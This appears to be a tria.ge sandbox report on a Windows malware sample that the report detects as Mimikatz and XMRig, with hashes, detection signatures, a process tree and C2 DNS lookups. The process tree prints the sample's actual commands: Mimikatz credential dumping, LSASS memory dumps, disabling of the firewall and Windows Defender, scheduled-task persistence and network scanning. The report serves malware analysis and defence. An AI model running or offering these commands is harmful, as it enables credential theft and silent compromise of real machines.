Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    15/10/2024, 02:14 UTC

General

  • Target

    bea313368ef8063b923d61a3e152b85375b32c4b21cc5dd0f8e68344ebd7d636N.exe

  • Size

    7.6MB

  • MD5

    9b1817a2ee30bbbce35c481b8afa4960

  • SHA1

    fec68058190c48b15e3edc07ab9a888387913e1d

  • SHA256

    bea313368ef8063b923d61a3e152b85375b32c4b21cc5dd0f8e68344ebd7d636

  • SHA512

    32dcf046626cc9b211a69eec6eaa672173d6ce723a53be23631796c747a4279c569a73d4019a74fedb9d9cb3428f911b06fb2b6556f7a30e0d8f2ddd4dbb9e6d

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 6 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 8 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 17 IoCs
  • Loads dropped DLL 24 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 8 IoCs
  • UPX packed file 28 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 57 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 31 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:768
      • C:\Windows\TEMP\tckjwhyci\aktvci.exe
        "C:\Windows\TEMP\tckjwhyci\aktvci.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1716
    • C:\Users\Admin\AppData\Local\Temp\bea313368ef8063b923d61a3e152b85375b32c4b21cc5dd0f8e68344ebd7d636N.exe
      "C:\Users\Admin\AppData\Local\Temp\bea313368ef8063b923d61a3e152b85375b32c4b21cc5dd0f8e68344ebd7d636N.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2488
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\rtldfmcc\nihkvnz.exe
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:2864
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2880
        • C:\Windows\rtldfmcc\nihkvnz.exe
          C:\Windows\rtldfmcc\nihkvnz.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:3036
    • C:\Windows\rtldfmcc\nihkvnz.exe
      C:\Windows\rtldfmcc\nihkvnz.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2776
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3040
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:636
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
            PID:2792
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2884
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2992
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2756
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2784
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static del all
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • Modifies data under HKEY_USERS
          PID:1996
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add policy name=Bastards description=FuckingBastards
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          • Modifies data under HKEY_USERS
          PID:2324
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add filteraction name=BastardsList action=block
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          • Modifies data under HKEY_USERS
          PID:2268
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c C:\Windows\ypbgnfgfn\livcfcfiu\wpcap.exe /S
          2⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1656
          • C:\Windows\ypbgnfgfn\livcfcfiu\wpcap.exe
            C:\Windows\ypbgnfgfn\livcfcfiu\wpcap.exe /S
            3⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:944
            • C:\Windows\SysWOW64\net.exe
              net stop "Boundary Meter"
              4⤵
                PID:2336
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "Boundary Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1712
              • C:\Windows\SysWOW64\net.exe
                net stop "TrueSight Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:792
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "TrueSight Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:548
              • C:\Windows\SysWOW64\net.exe
                net stop npf
                4⤵
                • System Location Discovery: System Language Discovery
                PID:2372
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop npf
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2164
              • C:\Windows\SysWOW64\net.exe
                net start npf
                4⤵
                  PID:2236
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:2468
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
                PID:2200
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2128
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:864
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2768
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:1104
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:1684
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\ypbgnfgfn\livcfcfiu\rjfiekzcc.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ypbgnfgfn\livcfcfiu\Scant.txt
                2⤵
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2204
                • C:\Windows\ypbgnfgfn\livcfcfiu\rjfiekzcc.exe
                  C:\Windows\ypbgnfgfn\livcfcfiu\rjfiekzcc.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ypbgnfgfn\livcfcfiu\Scant.txt
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:2228
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\ypbgnfgfn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ypbgnfgfn\Corporate\log.txt
                2⤵
                • Loads dropped DLL
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                PID:940
                • C:\Windows\ypbgnfgfn\Corporate\vfshost.exe
                  C:\Windows\ypbgnfgfn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1616
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "btldecrcl" /ru system /tr "cmd /c C:\Windows\ime\nihkvnz.exe"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:1236
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2244
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /sc minute /mo 1 /tn "btldecrcl" /ru system /tr "cmd /c C:\Windows\ime\nihkvnz.exe"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2916
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "fmullgzie" /ru system /tr "cmd /c echo Y|cacls C:\Windows\rtldfmcc\nihkvnz.exe /p everyone:F"
                2⤵
                  PID:1580
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:568
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "fmullgzie" /ru system /tr "cmd /c echo Y|cacls C:\Windows\rtldfmcc\nihkvnz.exe /p everyone:F"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:2972
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "hyigybsnt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tckjwhyci\aktvci.exe /p everyone:F"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2620
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:2396
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "hyigybsnt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tckjwhyci\aktvci.exe /p everyone:F"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:3012
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:2076
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:2992
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • Modifies data under HKEY_USERS
                  PID:2032
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:928
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:2740
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:1996
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • Modifies data under HKEY_USERS
                  PID:2324
                • C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe
                  C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 768 C:\Windows\TEMP\ypbgnfgfn\768.dmp
                  2⤵
                  • Executes dropped EXE
                  • Modifies data under HKEY_USERS
                  • Suspicious use of AdjustPrivilegeToken
                  PID:572
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:1276
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:2300
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:580
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:1768
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • Modifies data under HKEY_USERS
                  PID:2504
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net stop SharedAccess
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2256
                  • C:\Windows\SysWOW64\net.exe
                    net stop SharedAccess
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1876
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop SharedAccess
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:2492
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c netsh firewall set opmode mode=disable
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2220
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh firewall set opmode mode=disable
                    3⤵
                    • Modifies Windows Firewall
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    • Modifies data under HKEY_USERS
                    PID:892
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c netsh Advfirewall set allprofiles state off
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:1984
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh Advfirewall set allprofiles state off
                    3⤵
                    • Modifies Windows Firewall
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    • Modifies data under HKEY_USERS
                    PID:864
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net stop MpsSvc
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2064
                  • C:\Windows\SysWOW64\net.exe
                    net stop MpsSvc
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:2588
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop MpsSvc
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:2596
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net stop WinDefend
                  2⤵
                    PID:2460
                    • C:\Windows\SysWOW64\net.exe
                      net stop WinDefend
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:816
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop WinDefend
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:1764
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop wuauserv
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:1384
                    • C:\Windows\SysWOW64\net.exe
                      net stop wuauserv
                      3⤵
                        PID:1028
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop wuauserv
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:1736
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c sc config MpsSvc start= disabled
                      2⤵
                        PID:1508
                        • C:\Windows\SysWOW64\sc.exe
                          sc config MpsSvc start= disabled
                          3⤵
                          • Launches sc.exe
                          • System Location Discovery: System Language Discovery
                          PID:1328
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c sc config SharedAccess start= disabled
                        2⤵
                          PID:2132
                          • C:\Windows\SysWOW64\sc.exe
                            sc config SharedAccess start= disabled
                            3⤵
                            • Launches sc.exe
                            • System Location Discovery: System Language Discovery
                            PID:804
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config WinDefend start= disabled
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:2724
                          • C:\Windows\SysWOW64\sc.exe
                            sc config WinDefend start= disabled
                            3⤵
                            • Launches sc.exe
                            • System Location Discovery: System Language Discovery
                            PID:1592
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config wuauserv start= disabled
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:1496
                          • C:\Windows\SysWOW64\sc.exe
                            sc config wuauserv start= disabled
                            3⤵
                            • Launches sc.exe
                            PID:1064
                        • C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe
                          C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 1124 C:\Windows\TEMP\ypbgnfgfn\1124.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2912
                        • C:\Windows\TEMP\xohudmc.exe
                          C:\Windows\TEMP\xohudmc.exe
                          2⤵
                          • Executes dropped EXE
                          • Drops file in System32 directory
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of SetWindowsHookEx
                          PID:2612
                        • C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe
                          C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 1180 C:\Windows\TEMP\ypbgnfgfn\1180.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2876
                        • C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe
                          C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 1312 C:\Windows\TEMP\ypbgnfgfn\1312.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2820
                        • C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe
                          C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 1560 C:\Windows\TEMP\ypbgnfgfn\1560.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1856
                        • C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe
                          C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 1584 C:\Windows\TEMP\ypbgnfgfn\1584.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1564
                        • C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe
                          C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 2680 C:\Windows\TEMP\ypbgnfgfn\2680.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2000
                        • C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe
                          C:\Windows\TEMP\ypbgnfgfn\ctjtihzei.exe -accepteula -mp 2692 C:\Windows\TEMP\ypbgnfgfn\2692.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:284
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
                        1⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2364
                      • C:\Windows\SysWOW64\huzbiq.exe
                        C:\Windows\SysWOW64\huzbiq.exe
                        1⤵
                        • Executes dropped EXE
                        • Suspicious use of SetWindowsHookEx
                        PID:2756
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {7992D409-5805-4FE5-9E67-78F88167473F} S-1-5-18:NT AUTHORITY\System:Service:
                        1⤵
                          PID:2400
                          • C:\Windows\system32\cmd.EXE
                            C:\Windows\system32\cmd.EXE /c C:\Windows\ime\nihkvnz.exe
                            2⤵
                              PID:2360
                              • C:\Windows\ime\nihkvnz.exe
                                C:\Windows\ime\nihkvnz.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                • Suspicious use of SetWindowsHookEx
                                PID:2188
                            • C:\Windows\system32\cmd.EXE
                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\rtldfmcc\nihkvnz.exe /p everyone:F
                              2⤵
                                PID:976
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                  3⤵
                                    PID:2768
                                  • C:\Windows\system32\cacls.exe
                                    cacls C:\Windows\rtldfmcc\nihkvnz.exe /p everyone:F
                                    3⤵
                                      PID:1684
                                  • C:\Windows\system32\cmd.EXE
                                    C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\tckjwhyci\aktvci.exe /p everyone:F
                                    2⤵
                                      PID:1944
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        3⤵
                                          PID:904
                                        • C:\Windows\system32\cacls.exe
                                          cacls C:\Windows\TEMP\tckjwhyci\aktvci.exe /p everyone:F
                                          3⤵
                                            PID:1208

                                      Network

                                      • flag-us
                                        DNS
                                        uio.hognoob.se
                                        nihkvnz.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        uio.hognoob.se
                                        IN A
                                        Response
                                      • flag-us
                                        DNS
                                        uio.heroherohero.info
                                        nihkvnz.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        uio.heroherohero.info
                                        IN A
                                        Response
                                        uio.heroherohero.info
                                        IN A
                                        43.240.239.76
                                      • flag-us
                                        DNS
                                        yxw.hognoob.se
                                        nihkvnz.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        yxw.hognoob.se
                                        IN A
                                        Response
                                      • flag-us
                                        DNS
                                        2019.ip138.com
                                        nihkvnz.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        2019.ip138.com
                                        IN A
                                        Response
                                        2019.ip138.com
                                        IN CNAME
                                        waf.ip138.com
                                        waf.ip138.com
                                        IN A
                                        110.81.155.138
                                        waf.ip138.com
                                        IN A
                                        59.57.14.11
                                        waf.ip138.com
                                        IN A
                                        59.57.13.133
                                        waf.ip138.com
                                        IN A
                                        110.81.155.137
                                        waf.ip138.com
                                        IN A
                                        59.57.13.182
                                      • flag-us
                                        DNS
                                        pxi.hognoob.se
                                        aktvci.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        pxi.hognoob.se
                                        IN A
                                        Response
                                      • flag-us
                                        DNS
                                        haq.hognoob.se
                                        huzbiq.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        haq.hognoob.se
                                        IN A
                                        Response
                                      • flag-us
                                        DNS
                                        pxx.hognoob.se
                                        aktvci.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        pxx.hognoob.se
                                        IN A
                                        Response
                                      • 43.240.239.76:63145
                                        uio.heroherohero.info
                                        nihkvnz.exe
                                        152 B
                                        3
                                      • 110.81.155.138:80
                                        2019.ip138.com
                                        nihkvnz.exe
                                        152 B
                                        3
                                      • 59.57.14.11:80
                                        2019.ip138.com
                                        nihkvnz.exe
                                        152 B
                                        3
                                      • 59.57.13.133:80
                                        2019.ip138.com
                                        nihkvnz.exe
                                        152 B
                                        3
                                      • 8.8.8.8:53
                                        uio.hognoob.se
                                        dns
                                        nihkvnz.exe
                                        60 B
                                        136 B
                                        1
                                        1

                                        DNS Request

                                        uio.hognoob.se

                                      • 8.8.8.8:53
                                        uio.heroherohero.info
                                        dns
                                        nihkvnz.exe
                                        67 B
                                        83 B
                                        1
                                        1

                                        DNS Request

                                        uio.heroherohero.info

                                        DNS Response

                                        43.240.239.76

                                      • 8.8.8.8:53
                                        yxw.hognoob.se
                                        dns
                                        nihkvnz.exe
                                        60 B
                                        136 B
                                        1
                                        1

                                        DNS Request

                                        yxw.hognoob.se

                                      • 8.8.8.8:53
                                        2019.ip138.com
                                        dns
                                        nihkvnz.exe
                                        60 B
                                        158 B
                                        1
                                        1

                                        DNS Request

                                        2019.ip138.com

                                        DNS Response

                                        110.81.155.138
                                        59.57.14.11
                                        59.57.13.133
                                        110.81.155.137
                                        59.57.13.182

                                      • 8.8.8.8:53
                                        pxi.hognoob.se
                                        dns
                                        aktvci.exe
                                        60 B
                                        136 B
                                        1
                                        1

                                        DNS Request

                                        pxi.hognoob.se

                                      • 8.8.8.8:53
                                        haq.hognoob.se
                                        dns
                                        huzbiq.exe
                                        60 B
                                        136 B
                                        1
                                        1

                                        DNS Request

                                        haq.hognoob.se

                                      • 8.8.8.8:53
                                        pxx.hognoob.se
                                        dns
                                        aktvci.exe
                                        60 B
                                        136 B
                                        1
                                        1

                                        DNS Request

                                        pxx.hognoob.se

                                      MITRE ATT&CK Enterprise v15

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Windows\SysWOW64\Packet.dll

                                        Filesize

                                        95KB

                                        MD5

                                        86316be34481c1ed5b792169312673fd

                                        SHA1

                                        6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

                                        SHA256

                                        49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

                                        SHA512
